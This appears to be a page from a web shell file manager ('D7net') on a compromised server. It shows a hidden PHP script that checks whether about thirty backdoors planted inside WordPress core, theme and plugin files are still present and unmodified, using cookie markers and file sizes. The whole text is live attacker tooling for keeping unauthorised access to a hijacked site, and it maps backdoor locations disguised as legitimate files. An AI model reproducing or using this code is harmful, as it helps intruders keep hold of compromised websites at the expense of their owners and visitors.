D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.symbol
back
Copy
<?php $r = '/home/tmaizesj/public_html'; $x = ["/wp-includes/class-wp-walker.php"=>"bd@@67042017@@_COOKIE[3]", "/wp-content/themes/twentytwentyfive/patterns/grid-with-categories.php"=>"bd@@82477504@@sync_manager", "/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php"=>"bd@@82477959@@88", "/wp-content/plugins/woocommerce/templates/cart/mini-cart.php"=>"bd@@82478900@@80", "/wp-content/plugins/wpforms-lite/includes/fields/class-textarea.php"=>"bd@@82479188@@batch_process", "/wp-content/plugins/woocommerce/packages/action-scheduler/classes/ActionScheduler_ActionFactory.php"=>"bd@@82479314@@20", "/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-variation-items-field/popular.php"=>"bd@@82479372@@582", "/wp-content/plugins/all-in-one-seo-pack/app/Common/Views/admin/posts/cache_censor.php"=>"bd@@82479554@@1537", "/wp-content/plugins/elementor/core/app/modules/kit-library/connect/kit.library.php"=>"bd@@82479602@@1582", "/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Variables/poll.php"=>"bd@@82479634@@655", "/wp-content/plugins/wpforms-lite/lite/templates/education/builder/did.you.php"=>"bd@@82479794@@1605", "/wp-content/plugins/woocommerce/assets/client/blocks/product-results-count.asset.php"=>"bd@@82484404@@90", "/wp-content/plugins/simply-schedule-appointments/vendor/woocommerce/action-scheduler/classes/WP_CLI/Action/Cancel.Command.php"=>"bd@@82485821@@1818", "/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/phpdoc-reader/src/PhpDocReader/db_common.inc.php"=>"bd@@82485992@@665", "/wp-content/plugins/elementor/vendor_prefixed/twig/symfony/polyfill-php80/Resources/stubs/default_address.php"=>"bd@@82486040@@1688", "/wp-content/plugins/wpforms-lite/src/Forms/Fields/Addons/Signature/caddcl.php"=>"bd@@82486233@@553", "/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/core/src/Utils/fonctions.php"=>"bd@@82486329@@586", "/wp-content/themes/george-lois-wpcom/jract.php"=>"bd@@66421573@@2831", "/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php"=>"bd@@82490189@@68", "/wp-content/plugins/simply-schedule-appointments/includes/lib/td-health-check/includes/class-health-check.php"=>"bd@@82490321@@dataflow_engine", "/wp-content/plugins/woocommerce/templates/single-product/review.php"=>"bd@@82490400@@82", "/wp-content/plugins/google-analytics-for-wordpress/includes/gutenberg/headline-tool/phpinsight/lib/PHPInsight/tag.php"=>"bd@@82490484@@58", "/wp-includes/blocks/latest-posts.php"=>"bd@@82490584@@30", "/wp-content/plugins/wpforms-lite/src/Integrations/ConstantContact/V3/Api/Http/it_IT.php"=>"bd@@82490593@@1441", "/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/BillingPortal/Common.php"=>"bd@@82490609@@2055", "/wp-content/plugins/all-in-one-seo-pack/app/Common/Views/sitemap/xsl/partials/sortable.time.php"=>"bd@@82490615@@1598", "/wp-content/plugins/simply-schedule-appointments/vendor/symfony/polyfill-php80/Resources/stubs/config_server.php"=>"bd@@82490629@@1551", "/wp-content/plugins/wpforms-lite/src/Integrations/AI/API/Http/tuto5.php"=>"bd@@82490635@@668", "/wp-content/plugins/wpforms-lite/includes/admin/builder/class-builder.php"=>"bd@@66898179@@$_COOKIE[-", "/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-php80/bootstrap.php"=>"bd@@67165192@@buffer_cache"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');